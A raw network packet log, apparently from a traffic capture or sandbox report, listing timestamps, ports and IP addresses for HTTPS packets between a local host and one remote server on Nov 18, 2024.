                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119908094 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.119926929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120397091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120429039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120477915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120488882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120517969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.120536089 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158389091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158411026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158466101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158492088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158524036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158543110 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158967018 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.158982992 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159055948 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159066916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159123898 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159749031 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159763098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159833908 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159845114 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.159902096 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160332918 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160347939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160448074 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160458088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160512924 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160960913 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.160974026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.161046982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.161056995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.161114931 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236049891 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236066103 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236162901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236198902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236243963 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236582994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236597061 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236666918 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236677885 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.236731052 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.237127066 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.237140894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.237210035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.237221003 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.237294912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.238627911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.238641024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.238713026 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.238723993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.238773108 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.239227057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.239242077 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.239331007 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.239341021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.239388943 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277266979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277282953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277357101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277370930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277426004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277904034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277929068 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.277988911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278000116 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278059006 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278400898 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278439045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278481007 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278491974 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278523922 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278548002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278930902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.278944016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279015064 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279026985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279083014 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279612064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279638052 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279691935 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279705048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279731035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.279752970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.354568958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.354593039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.354676962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.354691029 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.354744911 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355192900 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355211020 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355279922 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355290890 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355335951 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355576992 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355592012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355664968 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355675936 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.355734110 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.356993914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.357012987 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.357078075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.357089043 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.357145071 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.357994080 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358011961 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358141899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358151913 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358232021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358304977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358330011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358381987 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358392000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358418941 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.358447075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396050930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396070957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396145105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396157026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396209002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396666050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396678925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396749020 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396759987 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.396815062 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397234917 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397249937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397319078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397330046 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397381067 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397820950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397835970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397902012 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397912979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.397973061 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398410082 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398422956 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398493052 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398504972 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.398557901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473454952 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473474979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473566055 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473602057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473666906 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473982096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.473998070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474071980 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474085093 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474153996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474461079 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474474907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474550962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474562883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.474634886 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476115942 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476130962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476192951 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476206064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476342916 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476512909 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476711035 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476726055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476795912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476809025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.476865053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477174997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477189064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477255106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477266073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.477329969 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514863968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514879942 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.514976978 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515002012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515068054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515522957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515538931 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515625954 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515636921 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.515686035 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516017914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516041994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516093016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516104937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516135931 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516156912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516419888 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516473055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516505003 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516515970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.516541004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517000914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517014027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517082930 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.517095089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567147017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567167044 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567354918 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567356110 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.567425013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592668056 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592685938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592780113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592840910 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592874050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592890024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592947006 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.592963934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.594192028 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.594204903 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.594274044 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.594286919 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595247030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595290899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595343113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595343113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595360041 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595573902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595587015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595643044 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595657110 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595685959 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595984936 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.595998049 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.596057892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.596071005 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.633861065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.633879900 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634010077 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634031057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634322882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634346962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634385109 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634398937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634427071 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634614944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634635925 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634713888 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.634726048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635155916 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635202885 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635221004 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635235071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635283947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635814905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635837078 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635885954 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635902882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.635926008 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.682645082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711126089 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711154938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711220980 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711240053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711289883 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711289883 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711663008 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711678982 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711740971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711754084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.711808920 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712093115 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712126970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712163925 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712174892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712199926 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.712222099 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.713018894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.713035107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.713090897 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.713102102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.713148117 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714229107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714243889 CET44349717172.67.185.54192.168.2.16
